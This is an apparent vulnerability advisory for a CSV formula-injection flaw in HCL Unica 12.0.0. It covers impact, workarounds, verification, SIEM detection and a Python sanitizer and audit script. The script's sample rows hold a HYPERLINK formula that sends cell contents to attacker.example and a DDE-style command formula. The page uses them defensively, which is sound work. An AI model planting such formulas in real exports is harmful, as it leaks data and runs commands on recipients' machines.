CVE-2025-51735

7.5 HIGH

📋 TL;DR

HCL Unica 12.0.0 writes user-controlled field values into its CSV exports without neutralizing cells that begin with formula characters (CSV/formula injection). When a recipient opens such an export in a spreadsheet application such as Microsoft Excel, the attacker-supplied cell is evaluated as a formula instead of being shown as text. Depending on the application and on which of its security prompts the user accepts, the formula can leak the contents of other cells to an attacker-controlled URL or, through DDE-style formulas, run commands on the recipient's workstation. Any organization using HCL Unica 12.0.0 for marketing automation that exports and shares CSV files is affected.

💻 Affected Systems

Products:
  • HCL Unica
Versions: 12.0.0
Operating Systems: All platforms running HCL Unica
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability is in the CSV export functionality. The attacker needs a way to get formula text into data that Unica later exports, and a victim must then open the generated file in a spreadsheet application that evaluates formulas; nothing is executed on the Unica server itself.

📦 What is this software?

HCL Unica is a marketing automation platform. The vulnerable component is its CSV export feature, which writes campaign and contact data out for use in other tools.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Code execution on the workstation of whoever opens a malicious export, if the spreadsheet application still permits DDE or external-link formulas and the user clicks through its warning prompts. From that workstation: full compromise, theft of local data and lateral movement into the network. Note that this is client-side execution, not remote code execution on the Unica server.

🟠

Likely Case

Exfiltration of cell contents (for example a HYPERLINK formula that appends neighbouring cells to an attacker-controlled URL) when a user opens the exported file, and limited command execution on workstations where DDE is still enabled. What leaks is whatever the export contains: typically sensitive marketing data and any credentials stored alongside it.

🟢

If Mitigated

Limited impact. With users trained to import rather than double-click exports and the spreadsheet application's DDE and external-link protections left on, an injected formula at worst produces a security prompt, a formula error or an application crash.

🌐 Internet-Facing: MEDIUM - Exploitation still needs a user to open the export, but an internet-facing Unica instance lets a remote attacker plant formula payloads in data that will later be exported.
🏢 Internal Only: HIGH - Internal users export and share CSV files routinely, so a single poisoned record or one compromised account creates many opportunities for a recipient to open a malicious export.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an authenticated account that can place data in, or generate, a CSV export; the public proof of concept demonstrates standard formula-injection payloads rather than anything specific to Unica.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: Not available

Restart Required: No

Instructions:

1. Monitor HCL security advisories for patch availability
2. Apply patch when released following vendor instructions
3. Test in non-production environment first

🔧 Temporary Workarounds

CSV Sanitization

Applies to: all platforms

Implement server-side sanitization of every exported cell: prefix any value that begins with =, +, -, @, tab (0x09) or carriage return (0x0D) with a single quote ('), wrap the cell in double quotes and double any embedded double quotes, so the spreadsheet treats the cell as text. Stripping the characters outright also works but alters legitimate data such as phone numbers that begin with +.

User Training

Applies to: all platforms

Train users not to double-click exported CSV files: inspect them in a text editor first, or load them through the spreadsheet's 'Import Data' / text import feature and set every column to the Text format so that formulas are not evaluated.

🧯 If You Can't Patch

  • Restrict CSV export permissions to trusted users only
  • Implement DLP rules that block or quarantine CSV files in email and file transfers when any cell begins with a formula character (=, +, -, @, tab, carriage return)

🔍 How to Verify

Check if Vulnerable:

Export a record whose fields contain values starting with =, +, -, @ (harmless test values such as =1+1 or @SUM(1+1) are enough), open the resulting file in a text editor and check whether those cells were neutralized (prefixed with a single quote or otherwise escaped). If the raw value appears unchanged, the installation is vulnerable. Do not open the test file directly in a spreadsheet application.

Check Version:

Check the Unica version in the administration interface or in the application logs; 12.0.0 is the affected version.

Verify Fix Applied:

Repeat the export test above after patching and confirm in the raw file that formula-leading cells are neutralized; only then confirm that they display as text when the file is opened in a spreadsheet application.
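The sanitization workaround and the export check above, as an added example that is not part of the original page and not HCL Unica's own code. The Python script below (1) reproduces a vulnerable export that writes cells verbatim, (2) applies the single-quote neutralization from the CSV Sanitization workaround, and (3) audits any CSV text for cells a spreadsheet would evaluate, which is the 'Check if Vulnerable' and 'Verify Fix Applied' test in script form and the same check a DLP rule would apply. The contact rows, column names and attacker values are constructed for the example; the HYPERLINK and DDE-style cells are the generic formula-injection patterns, not payloads taken from the public proof of concept.

```python
import csv
import io
import re

# Leading characters that Excel, LibreOffice Calc and Google Sheets treat as the
# start of a formula (OWASP CSV Injection guidance). Tab and carriage return are
# included because a cell that starts with them can still be evaluated.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Plain numbers such as "-5" or "+15550100" are parsed as numbers, not formulas,
# so they are exempt. A lone "-" placeholder is still flagged; extend this
# pattern if your exports use one.
_NUMBER = re.compile(r"^[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$")


def is_dangerous_cell(value) -> bool:
    """True if a spreadsheet would evaluate this cell as a formula."""
    if not isinstance(value, str) or not value:
        return False
    if value[0] not in FORMULA_TRIGGERS:
        return False
    return _NUMBER.match(value) is None


def neutralize_cell(value):
    """Prefix a dangerous cell with a single quote so it is rendered as text."""
    if is_dangerous_cell(value):
        return "'" + value
    return value


def export_csv(rows, sanitize=True) -> str:
    """Serialize rows to CSV text.

    sanitize=False reproduces the vulnerable behaviour (cells written verbatim);
    sanitize=True runs every cell through neutralize_cell. QUOTE_ALL wraps each
    cell in double quotes and doubles embedded quotes, as the workaround requires.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) if sanitize else c for c in row])
    return buf.getvalue()


def audit_csv(text: str) -> list:
    """Return (row, column, value) for every cell that would start a formula.

    Run this on a real export: an empty list means nothing in it starts a formula.
    """
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_dangerous_cell(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample: a contact export in which attacker-controlled contacts carry
# formula payloads in free-text fields. Column names are hypothetical.
SAMPLE_ROWS = [
    ["contact_id", "first_name", "last_name", "phone", "notes"],
    ["1001", "Alice", "Example", "+15550100", "renewal due in -5 days"],
    ["1002", '=HYPERLINK("https://attacker.example/?"&A2&B2&C2,"Open")',
     "Smith", "-5", "@SUM(1+1)"],
    ["1003", "=cmd|' /C calc'!A0", "Jones", "555-0199", "ok"],
]


if __name__ == "__main__":
    unsafe = export_csv(SAMPLE_ROWS, sanitize=False)
    print("vulnerable export flags:", audit_csv(unsafe))
    safe = export_csv(SAMPLE_ROWS)
    print("sanitized export flags:", audit_csv(safe))
    print(safe)
```

To audit a real export, call audit_csv(open(path, newline="").read()). The leading apostrophe stays visible in the opened sheet, so any downstream system that consumes the export by machine must strip it; the numeric exemption keeps phone numbers and negative amounts intact while a cell such as -1+1 is still, correctly, treated as a formula.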

📡 Detection & Monitoring

Log Indicators:

  • Unusual CSV export patterns
  • Multiple failed export attempts
  • Large CSV exports by single users

Network Indicators:

  • Unusual outbound CSV file transfers
  • CSV files in transit (mail attachments, file shares, exports) in which cells begin with formula characters (=, +, -, @)

SIEM Query:

source="unica" AND (event="csv_export" OR file_type="csv") AND user!=admin_user | stats count by user

The source, field and event names above are illustrative; map them to the fields your Unica log source actually emits, and baseline the per-user count so that the spike you alert on is meaningful.
